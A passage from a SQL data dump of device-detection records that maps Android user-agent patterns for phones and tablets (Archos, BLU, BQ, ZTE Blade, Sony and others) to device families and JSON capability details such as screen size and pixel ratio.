40 Helium) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 45b Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 45c Titanium) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 45d Platinum) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 50 Cobalt) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 50 Helium Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 50 Power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 50d Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 50e Helium) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 55 Cobalt Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 55 Platinum) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 55b Platinum) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 80d Xenon) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos Diamond S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Astro 5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Astro X55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Atlas A551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Avea inTouch 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Avvio Q797) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Avvio_L660) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Avvio_Q797) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; B1-850) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; B3 Maxi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; B3 Simply) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; B5531) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BGH JOY X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BGH Joy V6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BGH Joy X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLADE A110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU Advance 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU DASH M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU DASH X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU LIFE MARK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU LIFE ONE X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU LIFE X LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU LIFE XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU NEO X PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU NEO X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO 5.5 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO C 5+5 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO C 5+5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO C HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO C SUPER CAMERA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO G PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO ONE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU STUDIO X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BLU VIVO AIR LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BQS-4555) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BQS-4800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BQS-5011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BQS-5065) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BQS-5515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BQS_5505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BRAVIS_SPARK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BRAVIS_TREND) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BV2000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; BV2000s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Bay) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Beeline Fast +) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Beeline Pro 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Beeline Tab Fast 2) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Beeline_Fast_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Beeline_Pro_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Benefit_M503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Benefit_M5_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Blade A460) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Blade A475) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Blade L5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Blade S6 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Blade S6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Blade V580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Blade V6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Bmobile_AX1065) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C257) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C455) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C5502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C5503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C555) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6602) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 